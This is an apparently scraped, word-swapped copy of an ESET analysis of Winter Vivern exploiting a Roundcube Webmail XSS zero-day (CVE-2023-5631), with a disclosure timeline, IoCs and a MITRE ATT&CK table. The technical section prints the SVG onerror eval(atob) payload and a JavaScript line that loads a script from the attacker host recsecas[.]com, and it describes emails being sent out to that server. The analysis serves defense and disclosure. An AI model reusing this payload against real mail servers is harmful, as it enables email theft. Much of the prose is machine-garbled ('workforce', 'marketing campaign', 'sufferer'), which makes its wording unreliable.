Sunday, November 19, 2023
HomeCyber SecurityWinter Vivern exploits zero-day vulnerability in Roundcube Webmail servers

Winter Vivern exploits zero-day vulnerability in Roundcube Webmail servers


ESET Analysis

ESET Analysis recommends updating Roundcube Webmail to the newest obtainable model as quickly as doable

Winter Vivern exploits zero-day vulnerability in Roundcube Webmail servers

ESET Analysis has been carefully monitoring the cyberespionage operations of Winter Vivern for greater than a 12 months and, throughout our routine monitoring, we discovered that the group started exploiting a zero-day XSS vulnerability within the Roundcube Webmail server on October 11th, 2023. This can be a completely different vulnerability than CVE-2020-35730, which was additionally exploited by the group in line with our analysis.

In line with ESET telemetry information, the marketing campaign focused Roundcube Webmail servers belonging to governmental entities and a suppose tank, all in Europe.

Vulnerability disclosure timeline:

  • 2023-10-12: ESET Analysis reported the vulnerability to the Roundcube workforce.
  • 2023-10-14: The Roundcube workforce responded and acknowledged the vulnerability.
  • 2023-10-14: The Roundcube workforce patched the vulnerability.
  • 2023-10-16: The Roundcube workforce launched safety updates to handle the vulnerability (1.6.4, 1.5.5, and 1.4.15).
  • 2023-10-18: ESET CNA points a CVE for the vulnerability (CVE-2023-5631).
  • 2023-10-25: ESET Analysis blogpost printed.

We want to thank the Roundcube builders for his or her fast reply and for patching the vulnerability in such a short while body.

Winter Vivern profile

Winter Vivern is a cyberespionage group first revealed by DomainTools in 2021. It’s thought to have been lively since not less than 2020 and it targets governments in Europe and Central Asia. To compromise its targets, the group makes use of malicious paperwork, phishing web sites, and a customized PowerShell backdoor (see the articles from the State Cyber Safety Centre of Ukraine and from SentinelLabs). We consider with low confidence that Winter Vivern is linked to MoustachedBouncer, a complicated Belarus-aligned group that we first printed about in August, 2023.

Winter Vivern has been concentrating on Zimbra and Roundcube e mail servers belonging to governmental entities since not less than 2022 – see this text from Proofpoint. Specifically, we noticed that the group exploited CVE-2020-35730, one other XSS vulnerability in Roundcube, in August and September 2023. Notice that Sednit (often known as APT28) is exploiting this previous XSS vulnerability in Roundcube as properly, typically in opposition to the identical targets.

Technical particulars

Exploitation of the XSS vulnerability, assigned CVE-2023-5631, might be achieved remotely by sending a specifically crafted e mail message. On this Winter Vivern marketing campaign, the emails have been despatched from workforce.managment@outlook[.]com and had the topic Get began in your Outlook, as proven in Determine 1.

Figure-1-wintervivern-email
Determine 1. Malicious e mail message

At first sight, the e-mail doesn’t appear malicious – but when we study the HTML supply code, proven in Determine 2, we will see an SVG tag on the finish, which incorporates a base64-encoded payload.

Figure-2-winter-vivern-email-message
Determine 2. Electronic mail message with a malicious SVG tag

As soon as we decode the base64-encoded worth within the href attribute of the use tag, we’ve:

<svg id=”https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/x” xmlns=”http://www.w3.org/2000/svg”> <picture href=”https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/x” onerror=”eval(atob(‘<base64-encoded payload>’))” /></svg>

Because the x worth argument of the href attribute will not be a sound URL, this object’s onerror attribute shall be activated. Decoding the payload within the onerror attribute offers us the next JavaScript code (with the malicious URL manually defanged), which shall be executed within the browser of the sufferer within the context of their Roundcube session:

var fe=doc.createElement(‘script’);fe.src=”https://recsecas[.]com/controlserver/checkupdate.js”;doc.physique.appendChild(fe);

Surprisingly, we observed that the JavaScript injection labored on a totally patched Roundcube occasion. It turned out that this was a zero-day XSS vulnerability affecting the server-side script rcube_washtml.php, which doesn’t correctly sanitize the malicious SVG doc earlier than being added to the HTML web page interpreted by a Roundcube person. We reported it to Roundcube and it was patched on October 14th, 2023 (see this commit). The vulnerability impacts Roundcube variations 1.6.x earlier than 1.6.4, 1.5.x earlier than 1.5.5, and 1.4.x earlier than 1.4.15.

In abstract, by sending a specifically crafted e mail message, attackers are capable of load arbitrary JavaScript code within the context of the Roundcube person’s browser window. No handbook interplay apart from viewing the message in an online browser is required.

The second stage is an easy JavaScript loader named checkupdate.js and is proven in Determine 3.

Figure-3-javascript-loader
Determine 3. JavaScript loader

The ultimate JavaScript payload – proven in Determine 4 – is ready to listing folders and emails within the present Roundcube account, and to exfiltrate e mail messages to the C&C server by making HTTP requests to https://recsecas[.]com/controlserver/saveMessage.

Figure-4-final-payload
Determine 4. Remaining JavaScript payload exfiltrating e mail messages from the Roundcube account (a part of the obfuscated script eliminated for readability)

Conclusion

Winter Vivern has stepped up its operations through the use of a zero-day vulnerability in Roundcube. Beforehand, it was utilizing recognized vulnerabilities in Roundcube and Zimbra, for which proofs of idea can be found on-line.

Regardless of the low sophistication of the group’s toolset, it’s a risk to governments in Europe due to its persistence, very common operating of phishing campaigns, and since a major variety of internet-facing purposes are usually not usually up to date though they’re recognized to comprise vulnerabilities.

For any inquiries about our analysis printed on WeLiveSecurity, please contact us at threatintel@eset.com.
ESET Analysis gives non-public APT intelligence stories and information feeds. For any inquiries about this service, go to the ESET Menace Intelligence web page.

IoCs

Information

SHA-1

Filename

Detection

Description

97ED594EF2B5755F0549C6C5758377C0B87CFAE0

checkupdate.js

JS/WinterVivern.B

JavaScript loader.

8BF7FCC70F6CE032217D9210EF30314DDD6B8135

N/A

JS/Kryptik.BIK

JavaScript payload exfiltrating emails in Roundcube.

Community

IP

Area

Internet hosting supplier

First seen

Particulars

38.180.76[.]31

recsecas[.]com

M247 Europe SRL

2023-09-28

Winter Vivern C&C server

Electronic mail addresses

workforce.managment@outlook[.]com

This desk was constructed utilizing model 13 of the MITRE ATT&CK framework.

Tactic

ID

Identify

Description

Useful resource Improvement

T1583.001

Purchase Infrastructure: Domains

Winter Vivern operators purchased a website at Registrar.eu.

T1583.004

Purchase Infrastructure: Server

Winter Vivern operators rented a server at M247.

T1587.004

Develop Capabilities: Exploits

Winter Vivern operators in all probability developed an exploit for Roundcube.

Preliminary Entry

T1190

Exploit Public-Going through Software

Winter Vivern despatched an e mail exploiting CVE‑2023-5631 in Roundcube.

T1566

Phishing

The vulnerability is triggered by way of a phishing e mail, which ought to be opened within the Roundcube webmail by the sufferer.

Execution

T1203

Exploitation for Shopper Execution

The JavaScript payload is executed by an XSS vulnerability in Roundcube.

Discovery

T1087.003

Account Discovery: Electronic mail Account

The JavaScript payload can listing folders within the e mail account.

Assortment

T1114.002

Electronic mail Assortment: Distant Electronic mail Assortment

The JavaScript payload can exfiltrate emails from the Roundcube account.

Command and Management

T1071.001

Software Layer Protocol: Internet Protocols

C&C communications use HTTPs.

Exfiltration

T1041

Exfiltration Over C2 Channel

Exfiltration is completed by way of HTTPs and to the identical C&C server.

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Most Popular

Recent Comments